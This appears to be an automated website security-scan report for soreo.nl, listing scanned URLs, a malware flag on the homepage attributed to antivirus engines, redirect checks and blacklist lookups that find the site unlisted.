Scanned pages/files
Request | Server response | Status |
http://www.soreo.nl/ | 200 OK Content-Length: 14341 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://www.soreo.nl/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: soreo.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: soreo.nl
Referer: http://www.google.com/search?q=soreo.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=soreo.nl
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://soreo.nl/
Result: soreo.nl is not infected or malware details are not published yet.